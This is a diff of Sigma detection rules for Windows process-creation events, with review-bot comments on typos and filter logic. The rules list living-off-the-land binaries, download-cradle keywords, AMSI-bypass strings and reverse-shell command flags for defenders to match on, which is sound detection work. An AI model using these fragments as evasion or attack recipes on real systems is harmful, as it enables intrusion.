@@ -1,8 +1,7 @@ title: Suspicious Binary In User Directory Spawned From Office Application id: aa3a6f94-890e-4e22-b634-ffdfd54792cc status: test -description: Detects an executable in the users directory started from one of the - Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) +description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) references: - https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign - https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57 @@ -30,10 +29,11 @@ detection: - \VISIO.exe - \MSACCESS.exe - \EQNEDT32.exe - NewProcessName|startswith: C:\users\ - NewProcessName|endswith: .exe + # - '\OUTLOOK.EXE' too many FPs + NewProcessName|startswith: C:\users\ + NewProcessName|endswith: .exe filter: - NewProcessName|endswith: \Teams.exe + NewProcessName|endswith: \Teams.exe condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_office_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_office_susp_child_processes.yml index 22bf9d762..7e7b28323 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_susp_child_processes.yml 
@@ -1,19 +1,18 @@ title: Suspicious Microsoft Office Child Process id: 438025f9-5856-4663-83f7-52f878a70a50 related: - - id: c27515df-97a9-4162-8a60-dc0eeb51b775 - type: derived - - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 - type: derived - - id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 - type: obsoletes - - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a - type: obsoletes - - id: 04f5363a-6bca-42ff-be70-0d28bf629ead - type: obsoletes + - id: c27515df-97a9-4162-8a60-dc0eeb51b775 # Speicifc OneNote rule due to its recent usage in phishing attacks + type: derived + - id: e1693bc8-7168-4eab-8718-cdcaa68a1738 + type: derived + - id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 + type: obsoletes + - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a + type: obsoletes + - id: 04f5363a-6bca-42ff-be70-0d28bf629ead + type: obsoletes status: test -description: Detects a suspicious process spawning from one of the Microsoft Office - suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) +description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) references: - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html 
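Review bot: The comment added to the first `related` entry misspells "Specific": `# Specific OneNote rule due to its recent usage in phishing attacks`. The remaining four related ids carry no hint at all; a short per-id note naming the derived or obsoleted rule, as this commit already does for the OneNote and Outlook rules, would keep the cross-references readable without opening each file.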
@@ -26,8 +25,7 @@ references: - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml - https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html - https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ -author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, - Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io +author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io date: 2018/04/06 modified: 2023/04/24 tags: 
@@ -56,78 +54,78 @@ detection: - \wordpad.exe - \wordview.exe selection_child_processes: - - OriginalFileName: - - bitsadmin.exe - - CertOC.exe - - CertUtil.exe - - Cmd.Exe - - CMSTP.EXE - - cscript.exe - - curl.exe - - HH.exe - - IEExec.exe - - InstallUtil.exe - - javaw.exe - - Microsoft.Workflow.Compiler.exe - - msdt.exe - - MSHTA.EXE - - msiexec.exe - - Msxsl.exe - - odbcconf.exe - - pcalua.exe - - PowerShell.EXE - - RegAsm.exe - - RegSvcs.exe - - REGSVR32.exe - - RUNDLL32.exe - - schtasks.exe - - ScriptRunner.exe - - wmic.exe - - WorkFolders.exe - - wscript.exe - - NewProcessName|endswith: - - \AppVLP.exe - - \bash.exe - - \bitsadmin.exe - - \certoc.exe - - \certutil.exe - - \cmd.exe - - \cmstp.exe - - \control.exe - - \cscript.exe - - \curl.exe - - \forfiles.exe - - \hh.exe - - \ieexec.exe - - \installutil.exe - - \javaw.exe - - \mftrace.exe - - \Microsoft.Workflow.Compiler.exe - - \msbuild.exe - - \msdt.exe - - \mshta.exe - - \msidb.exe - - \msiexec.exe - - \msxsl.exe - - \odbcconf.exe - - \pcalua.exe - - \powershell.exe - - \pwsh.exe - - \regasm.exe - - \regsvcs.exe - - \regsvr32.exe - - \rundll32.exe - - \schtasks.exe - - \scrcons.exe - - \scriptrunner.exe - - \sh.exe - - \svchost.exe - - \verclsid.exe - - \wmic.exe - - \workfolders.exe - - \wscript.exe - selection_child_susp_paths: - NewProcessName|contains: + - OriginalFileName: + - bitsadmin.exe + - CertOC.exe + - CertUtil.exe + - Cmd.Exe + - CMSTP.EXE + - cscript.exe + - curl.exe + - HH.exe + - IEExec.exe + - InstallUtil.exe + - javaw.exe + - Microsoft.Workflow.Compiler.exe + - msdt.exe + - MSHTA.EXE + - msiexec.exe + - Msxsl.exe + - odbcconf.exe + - pcalua.exe + - PowerShell.EXE + - RegAsm.exe + - RegSvcs.exe + - REGSVR32.exe + - RUNDLL32.exe + - schtasks.exe + - ScriptRunner.exe + - wmic.exe + - WorkFolders.exe + - wscript.exe + - NewProcessName|endswith: + - \AppVLP.exe + - \bash.exe + - \bitsadmin.exe + - \certoc.exe + - \certutil.exe + - \cmd.exe + - \cmstp.exe + - \control.exe + - \cscript.exe + - 
\curl.exe + - \forfiles.exe + - \hh.exe + - \ieexec.exe + - \installutil.exe + - \javaw.exe + - \mftrace.exe + - \Microsoft.Workflow.Compiler.exe + - \msbuild.exe + - \msdt.exe + - \mshta.exe + - \msidb.exe + - \msiexec.exe + - \msxsl.exe + - \odbcconf.exe + - \pcalua.exe + - \powershell.exe + - \pwsh.exe + - \regasm.exe + - \regsvcs.exe + - \regsvr32.exe + - \rundll32.exe + - \schtasks.exe + - \scrcons.exe + - \scriptrunner.exe + - \sh.exe + - \svchost.exe + - \verclsid.exe + - \wmic.exe + - \workfolders.exe + - \wscript.exe + selection_child_susp_paths: # Idea: Laiali Kazalbach, Mohamed Elsayed (#4142) + NewProcessName|contains: - \AppData\ - \Users\Public\ - \ProgramData\ diff --git a/sigma/builtin/process_creation/proc_creation_win_office_winword_dll_load.yml b/sigma/builtin/process_creation/proc_creation_win_office_winword_dll_load.yml index 580eccce7..4975a3cbb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_winword_dll_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_winword_dll_load.yml @@ -1,11 +1,10 @@ title: Potential Arbitrary DLL Load Using Winword id: f7375e28-5c14-432f-b8d1-1db26c832df3 related: - - id: 2621b3a6-3840-4810-ac14-a02426086171 - type: obsoletes + - id: 2621b3a6-3840-4810-ac14-a02426086171 + type: obsoletes status: test -description: Detects potential DLL sideloading using the Microsoft Office winword - process via the '/l' flag. +description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. references: - https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py author: Victor Sergeev, oscd.community 
@@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WINWORD.exe - - OriginalFileName: WinWord.exe + - NewProcessName|endswith: \WINWORD.exe + - OriginalFileName: WinWord.exe selection_dll: - CommandLine|contains|all: + CommandLine|contains|all: - '/l ' - .dll condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml b/sigma/builtin/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml index f9ab4dbbe..058a9d85f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml @@ -1,13 +1,9 @@ title: Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution id: 02b18447-ea83-4b1b-8805-714a8a34546a status: test -description: 'Detects execution of Windows Defender "OfflineScannerShell.exe" from - its non standard directory. - - The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will - load any DLL named "mpclient.dll" from the current working directory. - - ' +description: | + Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory. + The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory. references: - https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/ author: frack113 
@@ -24,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \OfflineScannerShell.exe - - OriginalFileName: OfflineScannerShell.exe + - NewProcessName|endswith: \OfflineScannerShell.exe + - OriginalFileName: OfflineScannerShell.exe filter_main_legit_dir: CurrentDirectory: C:\Program Files\Windows Defender\Offline\ filter_main_empty: CurrentDirectory: '' filter_main_null: - CurrentDirectory: null + CurrentDirectory: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml b/sigma/builtin/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml index 26c5c88da..cd2e1ff47 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml @@ -1,12 +1,10 @@ title: Suspicious Execution Of PDQDeployRunner id: 12b8e9f5-96b2-41e1-9a42-8c6779a5c184 related: - - id: d679950c-abb7-43a6-80fb-2a480c4fc450 - type: similar + - id: d679950c-abb7-43a6-80fb-2a480c4fc450 + type: similar status: test -description: Detects suspicious execution of "PDQDeployRunner" which is part of the - PDQDeploy service stack that is responsible for executing commands and packages - on a remote machines +description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines references: - https://twitter.com/malmoeb/status/1550483085472432128 author: Nasreddine Bencherchali (Nextron Systems) 
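Review bot: The changed `CurrentDirectory:` line, like the two `filter_main_*` siblings beside it, keys on a field that the Security 4688 event does not carry, so in this builtin port none of the filters can match and `not 1 of filter_main_*` is always true; the rule then fires on every OfflineScannerShell.exe start, including from its legitimate directory. Replacing `null` with an empty value changes nothing here, since YAML reads both as null. The limitation should be stated next to the filters, e.g. `# NOTE: 4688 carries no CurrentDirectory; the legit-dir/empty/null filters cannot match in this port, expect FPs`, or the filters dropped and the rule's level reconsidered.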
@@ -23,35 +21,37 @@ detection: selection_parent: ParentProcessName|contains: PDQDeployRunner- selection_susp: - - NewProcessName|endswith: - - \wscript.exe - - \cscript.exe - - \rundll32.exe - - \regsvr32.exe - - \wmic.exe - - \msiexec.exe - - \mshta.exe - - \csc.exe - - \dllhost.exe - - \certutil.exe - - \scriptrunner.exe - - \bash.exe - - \wsl.exe - - NewProcessName|contains: - - C:\Users\Public\ - - C:\ProgramData\ - - C:\Windows\TEMP\ - - \AppData\Local\Temp - - CommandLine|contains: - - 'iex ' - - Invoke- - - DownloadString - - http - - ' -enc ' - - ' -encodedcommand ' - - FromBase64String - - ' -decode ' - - ' -w hidden' + # Improve this section by adding other suspicious processes, commandlines or paths + - NewProcessName|endswith: + # If you use any of the following processes legitimately comment them out + - \wscript.exe + - \cscript.exe + - \rundll32.exe + - \regsvr32.exe + - \wmic.exe + - \msiexec.exe + - \mshta.exe + - \csc.exe + - \dllhost.exe + - \certutil.exe + - \scriptrunner.exe + - \bash.exe + - \wsl.exe + - NewProcessName|contains: + - C:\Users\Public\ + - C:\ProgramData\ + - C:\Windows\TEMP\ + - \AppData\Local\Temp + - CommandLine|contains: + - 'iex ' + - Invoke- + - DownloadString + - http + - ' -enc ' + - ' -encodedcommand ' + - FromBase64String + - ' -decode ' + - ' -w hidden' condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the PDQDeploy tool to execute these commands diff --git a/sigma/builtin/process_creation/proc_creation_win_perl_inline_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_perl_inline_command_execution.yml index ef0c7501b..26ac4650e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_perl_inline_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_perl_inline_command_execution.yml 
@@ -1,8 +1,7 @@ title: Perl Inline Command Execution id: f426547a-e0f7-441a-b63e-854ac5bdf54d status: test -description: Detects execution of perl using the "-e"/"-E" flags. This is could be - used as a way to launch a reverse shell or execute live perl code. +description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code. references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \perl.exe - - OriginalFileName: perl.exe + - NewProcessName|endswith: \perl.exe + - OriginalFileName: perl.exe # Also covers perlX.XX.exe selection_cli: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_php_inline_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_php_inline_command_execution.yml index 1169ae6b6..360af07b0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_php_inline_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_php_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Php Inline Command Execution id: d81871ef-5738-47ab-9797-7a9c90cd4bfb status: test -description: Detects execution of php using the "-r" flag. This is could be used as - a way to launch a reverse shell or execute live php code. +description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code. references: - https://www.php.net/manual/en/features.commandline.php - https://www.revshells.com/ 
@@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \php.exe - - OriginalFileName: php.exe + - NewProcessName|endswith: \php.exe + - OriginalFileName: php.exe selection_cli: - CommandLine|contains: ' -r' + CommandLine|contains: ' -r' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_ping_hex_ip.yml b/sigma/builtin/process_creation/proc_creation_win_ping_hex_ip.yml index 74d96e35c..4a00c9cd5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ping_hex_ip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ping_hex_ip.yml @@ -20,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: 0x - NewProcessName|endswith: \ping.exe + CommandLine|contains: 0x + NewProcessName|endswith: \ping.exe condition: process_creation and selection fields: - ParentCommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_pktmon_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pktmon_execution.yml index ab7e30100..bf6072ff3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pktmon_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pktmon_execution.yml @@ -18,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \pktmon.exe - - OriginalFileName: PktMon.exe + - NewProcessName|endswith: \pktmon.exe + - OriginalFileName: PktMon.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/builtin/process_creation/proc_creation_win_plink_susp_tunneling.yml b/sigma/builtin/process_creation/proc_creation_win_plink_susp_tunneling.yml index 893685873..d164dbe64 100644 --- a/sigma/builtin/process_creation/proc_creation_win_plink_susp_tunneling.yml +++ b/sigma/builtin/process_creation/proc_creation_win_plink_susp_tunneling.yml 
@@ -1,8 +1,8 @@ title: Potential RDP Tunneling Via SSH Plink id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da related: - - id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d - type: similar + - id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d # ssh.exe + type: similar status: test description: Execution of plink to perform data exfiltration and tunneling references: @@ -21,13 +21,13 @@ detection: EventID: 4688 Channel: Security selection_a: - CommandLine|contains: :127.0.0.1:3389 - NewProcessName|endswith: \plink.exe + CommandLine|contains: :127.0.0.1:3389 + NewProcessName|endswith: \plink.exe selection_b1: - CommandLine|contains: :3389 - NewProcessName|endswith: \plink.exe + CommandLine|contains: :3389 + NewProcessName|endswith: \plink.exe selection_b2: - CommandLine|contains: + CommandLine|contains: - ' -P 443' - ' -P 22' condition: process_creation and (selection_a or all of selection_b*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powercfg_execution.yml b/sigma/builtin/process_creation/proc_creation_win_powercfg_execution.yml index 113317075..8b9acf5b4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powercfg_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powercfg_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Powercfg Execution To Change Lock Screen Timeout id: f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b status: test -description: Detects suspicious execution of 'Powercfg.exe' to change lock screen - timeout +description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout references: - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options 
@@ -18,17 +17,20 @@ detection: EventID: 4688 Channel: Security selection_power: - - NewProcessName|endswith: \powercfg.exe - - OriginalFileName: PowerCfg.exe + - NewProcessName|endswith: \powercfg.exe + - OriginalFileName: PowerCfg.exe selection_standby: - - CommandLine|contains|all: - - '/setacvalueindex ' - - SCHEME_CURRENT - - SUB_VIDEO - - VIDEOCONLOCK - - CommandLine|contains|all: - - '-change ' - - -standby-timeout- + # powercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK + - CommandLine|contains|all: + - '/setacvalueindex ' + - SCHEME_CURRENT + - SUB_VIDEO + - VIDEOCONLOCK + # powercfg -change -standby-timeout-dc 3000 + # powercfg -change -standby-timeout-ac 3000 + - CommandLine|contains|all: + - '-change ' + - -standby-timeout- condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml index ad06db8b1..a305852a2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml @@ -1,12 +1,10 @@ title: AADInternals PowerShell Cmdlets Execution - ProccessCreation id: c86500e9-a645-4680-98d7-f882c70c1ea3 related: - - id: 91e69562-2426-42ce-a647-711b8152ced6 - type: similar + - id: 91e69562-2426-42ce-a647-711b8152ced6 + type: similar status: test -description: Detects ADDInternals Cmdlet execution. A tool for administering Azure - AD and Office 365. Which can be abused by threat actors to attack Azure AD or - Office 365. +description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. references: - https://o365blog.com/aadinternals/ - https://github.com/Gerenios/AADInternals 
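Review bot: The re-flowed `description` line of the AADInternals rule keeps the misspelling "ADDInternals", which does not match the tool name used in the title and references; the line should read `description: Detects AADInternals Cmdlet execution. A tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.`. Joining the last two fragments also fixes the dangling "Which can be abused" sentence.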
@@ -26,14 +24,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.Exe - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.Exe + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: + # Since most of the cmdlets use a unique enough string which is "-AADInt" we only used that portion. For a complete list please check the references linked above - Add-AADInt - ConvertTo-AADInt - Disable-AADInt diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml index ac6b9874e..0000de9ea 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml @@ -1,13 +1,12 @@ title: Potential Active Directory Enumeration Using AD Module - ProcCreation id: 70bc5215-526f-4477-963c-a47a5c9ebd12 related: - - id: 9e620995-f2d8-4630-8430-4afd89f77604 - type: similar - - id: 74176142-4684-4d8a-8b0a-713257e7df8e - type: similar + - id: 9e620995-f2d8-4630-8430-4afd89f77604 + type: similar + - id: 74176142-4684-4d8a-8b0a-713257e7df8e + type: similar status: test -description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" - DLL. Which is often used by attackers to perform AD enumeration. +description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. references: - https://github.com/samratashok/ADModule - https://twitter.com/cyb3rops/status/1617108657166061568?s=20 
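Review bot: The re-flowed `description` of the AD module rule names the library as "Microsoft.ActiveDirectory.Management.dl", one character short of the `Microsoft.ActiveDirectory.Management.dll` value the rule's `selection_dll` actually matches on; a reader comparing the two will assume the selection is wrong. Change it to `description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL. Which is often used by attackers to perform AD enumeration.`.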
@@ -26,18 +25,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Import-Module ' - 'ipmo ' selection_dll: - CommandLine|contains: Microsoft.ActiveDirectory.Management.dll + CommandLine|contains: Microsoft.ActiveDirectory.Management.dll condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the library for administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_add_windows_capability.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_add_windows_capability.yml index 7b67730a6..73b32ff77 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_add_windows_capability.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_add_windows_capability.yml @@ -1,11 +1,10 @@ title: Add Windows Capability Via PowerShell Cmdlet id: b36d01a3-ddaf-4804-be18-18a6247adfcd related: - - id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429 - type: similar + - id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429 + type: similar status: experimental -description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. - Notable capabilities could be "OpenSSH" and others. +description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. references: - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content 
@@ -22,19 +21,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: Add-WindowsCapability + CommandLine|contains: Add-WindowsCapability selection_capa: - CommandLine|contains: OpenSSH. + CommandLine|contains: OpenSSH. # For both "OpenSSH.Server" and "OpenSSH.Client" condition: process_creation and (all of selection_*) falsepositives: - - Legitimate usage of the capabilities by administrators or users. Add additional - filters accordingly. + - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml index d37eb1f0f..7d9d02fc4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml @@ -1,11 +1,10 @@ title: Potential AMSI Bypass Via .NET Reflection id: 30edb182-aa75-42c0-b0a9-e998bb29067c related: - - id: 4f927692-68b5-4267-871b-073c45f4f6fe - type: obsoletes + - id: 4f927692-68b5-4267-871b-073c45f4f6fe + type: obsoletes status: test -description: Detects Request to "amsiInitFailed" that can be used to disable AMSI - Scanning +description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning references: - https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/ - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ 
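Review bot: The title and description present a generic `Add-WindowsCapability` detection ("Notable capabilities could be OpenSSH and others"), but `selection_capa` is a single value `OpenSSH.` and the condition requires `all of selection_*`, so only the OpenSSH client/server capability is ever detected. Either narrow the documentation, e.g. `description: Detects usage of the "Add-WindowsCapability" cmdlet to add the OpenSSH.Server or OpenSSH.Client capability, which enables remote shell access to the host.`, or turn `selection_capa` into a list if further capabilities are meant to be covered. The added comment `# For both "OpenSSH.Server" and "OpenSSH.Client"` is good as is.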
@@ -23,11 +22,11 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - System.Management.Automation.AmsiUtils - amsiInitFailed selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - '[Ref].Assembly.GetType' - SetValue($null,$true) - NonPublic,Static diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml index 2d5c1f030..b18f5a8b7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml @@ -1,11 +1,10 @@ title: Potential AMSI Bypass Using NULL Bits id: 92a974db-ab84-457f-9ec0-55db83d7a825 related: - - id: fa2559c8-1197-471d-9cdd-05a0273d4522 - type: similar + - id: fa2559c8-1197-471d-9cdd-05a0273d4522 + type: similar status: experimental -description: Detects usage of special strings/null bits in order to potentially bypass - AMSI functionalities +description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities references: - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi author: Nasreddine Bencherchali (Nextron Systems) @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - if(0){{{0}}}' -f $(0 -as [char]) + - '#' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_audio_capture.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_audio_capture.yml index f5a17f61e..b51993490 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_audio_capture.yml 
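Review bot: `selection_2` pins exact spacing with `SetValue($null,$true)` and `NonPublic,Static`, so the equally common `SetValue($null, $true)` / `'NonPublic, Static'` spellings pass through — Sigma `contains` is case-insensitive but not whitespace-insensitive. Consider loosening to the stable prefixes, e.g. `- SetValue($null` and `- NonPublic`, which together with `[Ref].Assembly.GetType` in the same `contains|all` still requires all three fragments to co-occur. The `condition` for this rule is outside the hunk.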
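Review bot: The second `CommandLine|contains` value on the new side appears as a bare `'#'`; if that is the literal in the committed YAML (rather than a `#<NULL>` token lost in rendering), the rule fires on every PowerShell command line that contains a comment character, which would bury this `experimental` rule in noise. Please confirm the value and, if it really is `'#'`, restore the distinguishing null-byte marker or drop the entry. The reference anchor (`#amsi-bypass-using-null-bits`) suggests the technique depends on the character that follows `#`, so `#` alone carries no signal.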
+++ b/sigma/builtin/process_creation/proc_creation_win_powershell_audio_capture.yml @@ -6,8 +6,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md - https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html - https://github.com/frgnca/AudioDeviceCmdlets -author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, - Nasreddine Bencherchali (Nextron Systems) +author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/24 modified: 2023/04/06 tags: @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - WindowsAudioDevice-Powershell-Cmdlet - Toggle-AudioDevice - 'Get-AudioDevice ' diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml index b85f034f1..9a8bac831 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml +++ 